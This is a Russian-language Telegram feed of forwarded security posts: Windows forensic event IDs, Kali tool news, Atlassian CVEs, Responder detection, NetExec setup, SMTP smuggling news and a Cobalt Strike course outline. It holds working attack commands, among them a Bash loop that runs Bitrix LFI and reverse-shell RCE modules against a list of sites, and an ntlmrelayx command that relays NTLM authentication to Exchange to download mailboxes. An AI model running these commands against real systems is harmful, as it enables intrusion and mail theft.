Forwarded from Blue (h/c)at Café (nataly)
При проведении расследований на компьютерах Windows, ключевым аспектом является анализ журналов событий. Эти журналы предоставляют обширные данные, которые могут помочь выявить необычные или подозрительные действия.
Расположение журнала:
C:\Windows\System32\winevt\Logs
Вот чек лист основных ID событий, на которые следует обратить внимание:
3: Создание нового BITS задания.
4: BITS задание выполнено.
5: BITS задание завершено.
59: BITS начала выполнение задания.
60: BITS остановила выполнение задания.
21: Успешный вход в систему.
22: Получено уведомление о запуске оболочки.
23: Успешный выход из сеанса.
24: Сеанс был отключен.
25: Успешное переподключение сеанса.
100: Начало выполнения задачи.
102: Задача завершена.
106: Задача зарегистрирована.
📌
Журнал по умолчанию выключен.
1149: Успешная проверка подлинности пользователя.
1102: Начало много-транспортного соединения с сервером.
1024-1026: События подключения и отключения RDP.
4624: Успешный вход учетной записи.
4625: Ошибка входа учетной записи.
4634-4722: События учетных записей и их изменения.
5007: Изменение конфигурации Windows Defender.
1116: Обнаружение вредоносного ПО.
1117: Действия по защите компьютера.
5861: Подписка на события.
5860: WMI запрос.
5857: Запуск провайдера.
7030: Ошибка создания службы.
7045: Служба создана.
600: Стартовал поставщик "Variable".
4103-4104: Выполнение модулей и создание скриптов. (Необходимо включить данное логирование)
#purpleteam #soc
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from Похек (Sergey Zybnev)
Вышла Kali Linux 2023.4 с 15 новыми инструментами
Разработчики представили Kali Linux 2023.4, четвертую и последнюю версию дистрибутива в 2023 году. Новинка уже доступна для загрузки, содержит сразу 15 новых инструментов и GNOME 45.
Команда Offensive Security сообщает, что в финальном релизе этого года в ОС добавлено не так много новых функций, зато версия ядра обновлена до версии 6.3.7, а также появились сразу 15 новых инструментов:
cabby — имплементация клиента TAXII;
cti-taxii-client — библиотека клиента TAXII 2;
enum4linux-ng — следующее поколение enum4linux с дополнительными возможностями (инструмент энумерации Windows/Samba);
exiflooter — поиск геолокации по всем URL-адресам и каталогам изображений;
h8mail — email OSINT и инструмент для поиска утечек паролей;
Havoc — современная и гибкая система управления и контроля для пост-эксплуатации;
OpenTAXII — имплементация сервера TAXII;
PassDetective — сканирование истории shell-команд для обнаружения случайно записанных паролей, API-ключей и секретов;
Portspoof — все 65535 TCP портов всегда открыты и эмулируют сервисы;
Raven — легкий HTTP-сервис загрузки файлов;
ReconSpider — продвинутый фреймворк для OSINT;
rling — RLI Next Gen (Rling), более быстрая многопоточная и многофункциональная альтернатива rli;
Sigma-Cli — список и преобразование правил Sigma в языки запросов;
sn0int — полуавтоматический OSINT-фреймворк и менеджер пакетов;
SPIRE — набор API-интерфейсов SPIFFE Runtime Environment для установления доверия между программными системами.
📌 Я лично заинтересован в enum4linux-ng, h8mail, Havoc и Portspoof.
Если вы тоже не знаете, что такое TAXII, вы не одни такие :D. Вот что это:
TAXII – это протокол, определяющий способы обмена информацией о киберугрозах через службы и средства обмена сообщениями (RESTful API), и набор требований для клиента и сервера. В TAXII поддерживаются две основные модели обмена информации об угрозах – Collection и Channel. 😉
🌚 @poxek
Разработчики представили Kali Linux 2023.4, четвертую и последнюю версию дистрибутива в 2023 году. Новинка уже доступна для загрузки, содержит сразу 15 новых инструментов и GNOME 45.
Команда Offensive Security сообщает, что в финальном релизе этого года в ОС добавлено не так много новых функций, зато версия ядра обновлена до версии 6.3.7, а также появились сразу 15 новых инструментов:
cabby — имплементация клиента TAXII;
cti-taxii-client — библиотека клиента TAXII 2;
enum4linux-ng — следующее поколение enum4linux с дополнительными возможностями (инструмент энумерации Windows/Samba);
exiflooter — поиск геолокации по всем URL-адресам и каталогам изображений;
h8mail — email OSINT и инструмент для поиска утечек паролей;
Havoc — современная и гибкая система управления и контроля для пост-эксплуатации;
OpenTAXII — имплементация сервера TAXII;
PassDetective — сканирование истории shell-команд для обнаружения случайно записанных паролей, API-ключей и секретов;
Portspoof — все 65535 TCP портов всегда открыты и эмулируют сервисы;
Raven — легкий HTTP-сервис загрузки файлов;
ReconSpider — продвинутый фреймворк для OSINT;
rling — RLI Next Gen (Rling), более быстрая многопоточная и многофункциональная альтернатива rli;
Sigma-Cli — список и преобразование правил Sigma в языки запросов;
sn0int — полуавтоматический OSINT-фреймворк и менеджер пакетов;
SPIRE — набор API-интерфейсов SPIFFE Runtime Environment для установления доверия между программными системами.
TAXII – это протокол, определяющий способы обмена информацией о киберугрозах через службы и средства обмена сообщениями (RESTful API), и набор требований для клиента и сервера. В TAXII поддерживаются две основные модели обмена информации об угрозах – Collection и Channel.
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from Информация опасносте
Atlassian молодцы, на 9 из 10 (в смысле, по критичности уязвимостей)
• CVE-2023-22522: Template injection flaw allowing authenticated users, including those with anonymous access, to inject unsafe input into a Confluence page (critical, with a 9.0 severity score). The flaw impacts all Confluence Data Center and Server versions after 4.0.0 and up to 8.5.3.
• CVE-2023-22523: Privileged RCE in Assets Discovery agent impacting Jira Service Management Cloud, Server, and Data Center (critical, with a 9.8 severity score). Vulnerable Asset Discovery versions are anything below 3.2.0 for Cloud and 6.2.0 for Data Center and Server.
• CVE-2023-22524: Bypass of blocklist and macOS Gatekeeper on the companion app for Confluence Server and Data Center for macOS, impacting all versions of the app prior to 2.0.0 (critical, with a 9.6 severity score).
• CVE-2022-1471: RCE in SnakeYAML library impacting multiple versions of Jira, Bitbucket, and Confluence products (critical, with a 9.8 severity score).
• CVE-2023-22522: Template injection flaw allowing authenticated users, including those with anonymous access, to inject unsafe input into a Confluence page (critical, with a 9.0 severity score). The flaw impacts all Confluence Data Center and Server versions after 4.0.0 and up to 8.5.3.
• CVE-2023-22523: Privileged RCE in Assets Discovery agent impacting Jira Service Management Cloud, Server, and Data Center (critical, with a 9.8 severity score). Vulnerable Asset Discovery versions are anything below 3.2.0 for Cloud and 6.2.0 for Data Center and Server.
• CVE-2023-22524: Bypass of blocklist and macOS Gatekeeper on the companion app for Confluence Server and Data Center for macOS, impacting all versions of the app prior to 2.0.0 (critical, with a 9.6 severity score).
• CVE-2022-1471: RCE in SnakeYAML library impacting multiple versions of Jira, Bitbucket, and Confluence products (critical, with a 9.8 severity score).
Forwarded from s0i37_channel
Responder является мощным атакующим инструментом, must-have для любого внутрянщика. Отвечая ложными ответами на широковещательные разрешения имён (например через NetBIOS) хакер может заставить вашу рабочую станцию подключиться куда угодно, и даже к нему самому. В итоге это приводит к ошибочным подключениям, с как правило автоматической сквозной аутентификацией. В свою очередь это разглашает учетные данные, которые могут быть подвергнуты bruteforce атаке, либо для обхода аутентификации с помощью NTLM-relay атак. Иногда с помощью responder удаётся даже проксировать веб трафик жертвы.
Так много атак... Но можно ли как то обнаружить responder?
Так много атак... Но можно ли как то обнаружить responder?
Forwarded from s0i37_channel
Обнаружить responder проще простого. Достаточно лишь сгенерировать случайное короткое имя и спросить про него широковещательно. Если упрощённо, то - ping blablabla, если ответ есть - значит злоумышленник рядом с вами.
Forwarded from s0i37_channel
Скрипт https://github.com/s0i37/defence/blob/main/netbios.py делает эту проверку более точно. Он периодически шлёт в сеть широковещательно NetBIOS-запросы со случайными именами. И как только начинают поступать ответы - это сигнал что рядом с вами кто то запустил responder.
Защититься от атак responder это одно, но выявлять такие атаки - значит заметить внутреннего нарушителя на ранней стадии.
Защититься от атак responder это одно, но выявлять такие атаки - значит заметить внутреннего нарушителя на ранней стадии.
😴1
💻 POC для данной уязвимости
🔍 Подробнее о CVE-2022-1026
Please open Telegram to view this post
VIEW IN TELEGRAM
👍4💅2🔥1
Forwarded from SecuriXy.kz
CrackMapExec - все...
переходим на NetExec
Вышла обнова v1.1.0 - nxc4u, новые фичи типа Kerberos Constrained Delegation, Execute Tasks on behalf of logged-on Users with Scheduled Tasks, BloodHound now supports computer accounts, FTP Enhancement, Module sorting, WinRM improvements и др
https://www.netexec.wiki
Ставиться проще простого через pipx
Запускается тоже просто
Для простоты восприятия можете добавить ~/.zshrc
переходим на NetExec
Вышла обнова v1.1.0 - nxc4u, новые фичи типа Kerberos Constrained Delegation, Execute Tasks on behalf of logged-on Users with Scheduled Tasks, BloodHound now supports computer accounts, FTP Enhancement, Module sorting, WinRM improvements и др
https://www.netexec.wiki
Ставиться проще простого через pipx
apt install pipx git
pipx ensurepath
pipx install git+https://github.com/Pennyw0rth/NetExec
Запускается тоже просто
NetExec
nxc
nxcdb
netexec
nxcdb
Для простоты восприятия можете добавить ~/.zshrc
alias cme=netexec
alias crackmapexec=netexec
Forwarded from LamerZen (Zenmovie)
godfuzz3r несколько месяцев написал плагин для бурпа, который декодит unicode
GitHub
GitHub - godfuzz3r/burp-ununicode: "de-unicode" unicode escaped sequenses
"de-unicode" unicode escaped sequenses. Contribute to godfuzz3r/burp-ununicode development by creating an account on GitHub.
Forwarded from Склад
GitHub
GitHub - pucherot/Pi.Alert: WIFI / LAN intruder detector. Check the devices connected and alert you with unknown devices. It also…
WIFI / LAN intruder detector. Check the devices connected and alert you with unknown devices. It also warns of the disconnection of "always connected" devices - pucherot/Pi.Alert
Forwarded from Похек (Sergey Zybnev)
quick-tricks
9 MB
Когда-то я выкладывал пост про интересную тулзу для быстрой проверки Bitrix на наличие простых уязвимостей. И я писал, что мол написал скрипт, но с вами им не поделился 🌚
Исправляюсь! Переписал скрипт, теперь он будет бегать по всем урлам построчно и проверять на всё что только можно из этого инструмента, кроме XSS, т.к. модуль фолзит, из-за того, что нагрузка тупо вставляется и если 200, то он пишет что якобы XSS нашёл, но в 99,999% случаев, сайт просто проглотит нагрузку и ничего не случиться.
#!/bin/bash
echo "Lauch netcat for revshells"
printf "Enter IP ($(curl -s 2ip.ru)): "
read $IP
printf "Enter Port: "
read $PORT
for ((i=1; i <= $(wc -l scope.txt | awk '{print $1;}'); i++))
do
quick-tricks spoofing -u $(sed -n "$i p" scope.txt)
quick-tricks redirect -u $(sed -n "$i p" scope.txt)
quick-tricks lfi -u $(sed -n "$i p" scope.txt)
quick-tricks recon -a -u $(sed -n "$i p" scope.txt)
quick-tricks rce vote-agent -u $(sed -n "$i p" scope.txt) --lhost $IP --lport $PORT --agentId 2
quick-tricks rce vote-agent -u $(sed -n "$i p" scope.txt) --lhost $IP --lport $PORT --agentId 4
quick-tricks rce vote-agent -u $(sed -n "$i p" scope.txt) --lhost $IP --lport $PORT --agentId 7
quick-tricks rce html-editor -u $(sed -n "$i p" scope.txt) --lhost $IP --lport $PORT
done
Please open Telegram to view this post
VIEW IN TELEGRAM
❤🔥1💔1
Forwarded from Proxy Bar
CVE-2023-6553 Exploit
Плагин
*
exploit
#wordpress #rce
Плагин
Backup Migration для WordPress , RCE до версии 1.3.7 включительно *
exploit
#wordpress #rce
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥3🥴1
Pentester's Backlog
MireaCTF finals Пока так 👍
По итогу финалов занимаем почётное 3-е место в официальном зачёте (на скрине общий).
Жанр Attack-Defense сам по себе очень интересен, заставляет не только поломать сервисы, но и поправить их (причём в довольно быстром ритме, всё же лидерборд не стоит на месте🐈 ), и вся эта ред/блю тимерская суета принесла много положительных эмоций
kurilka ❤️
Жанр Attack-Defense сам по себе очень интересен, заставляет не только поломать сервисы, но и поправить их (причём в довольно быстром ритме, всё же лидерборд не стоит на месте
kurilka ❤️
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥2❤1
Дальше - больше, лучше, качественнее, информативней и оперативнее!
Please open Telegram to view this post
VIEW IN TELEGRAM
💊3🔥1
Forwarded from true_security
первый релиз описанного выше модуля (целиком со всем проектом impacket):
https://github.com/feedb/impacket_ews
Возможно. у кого то найдется время и желание потестировать и закинуть запрос на добавление/улучшение.
запуск:
ntlmrelayx.py -smb2support -t https://exchange.com/EWS/exchange.asmx --ews --folder inbox
папки могут быть: inbox, drafts, sentItems, outbox, deletedItems
по дефолту качает inbox
https://github.com/feedb/impacket_ews
Возможно. у кого то найдется время и желание потестировать и закинуть запрос на добавление/улучшение.
запуск:
ntlmrelayx.py -smb2support -t https://exchange.com/EWS/exchange.asmx --ews --folder inbox
папки могут быть: inbox, drafts, sentItems, outbox, deletedItems
по дефолту качает inbox
GitHub
GitHub - feedb/impacket_ews
Contribute to feedb/impacket_ews development by creating an account on GitHub.
Forwarded from SecuriXy.kz
#SMTP Smuggling - #Spoofing E-Mails Worldwide
Вы просто прочитайте ответы вендоров:
Microsoft
"Thank you again for submitting this issue to Microsoft. Currently, MSRC prioritizes vulnerabilities that are assessed as “Important” or “Critical'’ severities for immediate servicing"
Cisco
"As previously mentioned, the "vulnerability" in Cisco Secure Email (Cloud) Gateway is not a bug, but a feature"
Нет слов, держите штаны покрепче...
https://sec-consult.com/blog/detail/smtp-smuggling-spoofing-e-mails-worldwide/
Вы просто прочитайте ответы вендоров:
Microsoft
"Thank you again for submitting this issue to Microsoft. Currently, MSRC prioritizes vulnerabilities that are assessed as “Important” or “Critical'’ severities for immediate servicing"
Cisco
"As previously mentioned, the "vulnerability" in Cisco Secure Email (Cloud) Gateway is not a bug, but a feature"
Нет слов, держите штаны покрепче...
https://sec-consult.com/blog/detail/smtp-smuggling-spoofing-e-mails-worldwide/
Forwarded from Cybred
Курс Red Team Operations with Cobalt Strike
Cobalt Strike — известный фреймворк пост-эксплуатации, предназначенный для выполнения целевых атак, имитации продвинутых действий хакеров, а также доставки полезной нагрузки на компьютеры жертв.
Операции Red Team позволяют максимально натуралистично имитировать атаку группы профессиональных внешних нарушителей для выявления уязвимостей инфраструктуры.
В этом курсе вы узнаете, как использовать Cobalt Strike в качестве инфраструктуры управления и контроля (C2), использовать маячки (beacon'ы) и специализированные профили для проведения необходимых техник Red Team и тестирования на проникновение.
Содержание курса:
— Operations: настройка сервера команды, глубокое погружения в модель Cobalt Strike для долгосрочных распределенных операций
— Infrastructure: управление листенерами и настройка различных вариантов маячков
— C2: введение в Malleable C2 — язык Cobalt Strike, предназначенный для настройки сетевых индикаторов
— Weaponization: объединение полезной нагрузки с артефактом или эксплойтом, который ее запускает, введение в Artifact Kit и Resource Kit
— Initial Access: веб-уязвимости и целевой фишинг
— Post Exploitation: как управлять маячками и сеансами, выполнять команды, извлекать данные; регистрировать нажатия клавиш, делать скриншоты, техники пост-эксплуатации.
— Privilege Escalation: представлен набор Elevate Kit, рассказывается об использовании SharpUp для поиска неправильных конфигураций и о том, как повысить права с помощью учетных данных; Kerberoasting и использование mimikatz
— Lateral Movement: научитесь красть токены, проводить атаку pass-the-hash и генерировать "золотые билеты" Kerberos
— Pivoting: как туннелировать Metasploit® Framework и другие инструменты через SOCKS-прокси
Cobalt Strike — известный фреймворк пост-эксплуатации, предназначенный для выполнения целевых атак, имитации продвинутых действий хакеров, а также доставки полезной нагрузки на компьютеры жертв.
Операции Red Team позволяют максимально натуралистично имитировать атаку группы профессиональных внешних нарушителей для выявления уязвимостей инфраструктуры.
В этом курсе вы узнаете, как использовать Cobalt Strike в качестве инфраструктуры управления и контроля (C2), использовать маячки (beacon'ы) и специализированные профили для проведения необходимых техник Red Team и тестирования на проникновение.
Содержание курса:
— Operations: настройка сервера команды, глубокое погружения в модель Cobalt Strike для долгосрочных распределенных операций
— Infrastructure: управление листенерами и настройка различных вариантов маячков
— C2: введение в Malleable C2 — язык Cobalt Strike, предназначенный для настройки сетевых индикаторов
— Weaponization: объединение полезной нагрузки с артефактом или эксплойтом, который ее запускает, введение в Artifact Kit и Resource Kit
— Initial Access: веб-уязвимости и целевой фишинг
— Post Exploitation: как управлять маячками и сеансами, выполнять команды, извлекать данные; регистрировать нажатия клавиш, делать скриншоты, техники пост-эксплуатации.
— Privilege Escalation: представлен набор Elevate Kit, рассказывается об использовании SharpUp для поиска неправильных конфигураций и о том, как повысить права с помощью учетных данных; Kerberoasting и использование mimikatz
— Lateral Movement: научитесь красть токены, проводить атаку pass-the-hash и генерировать "золотые билеты" Kerberos
— Pivoting: как туннелировать Metasploit® Framework и другие инструменты через SOCKS-прокси
YouTube
Red Team Ops with Cobalt Strike (1 of 9): Operations
Course Playlist: https://www.youtube.com/playlist?list=PL9HO6M_MU2nfQ4kHSCzAQMqxQxH47d1no
This video introduces the Red Team Operations with Cobalt Strike course and kicks off its first lecture. The operations lecture starts with an overview of the Cobalt…
This video introduces the Red Team Operations with Cobalt Strike course and kicks off its first lecture. The operations lecture starts with an overview of the Cobalt…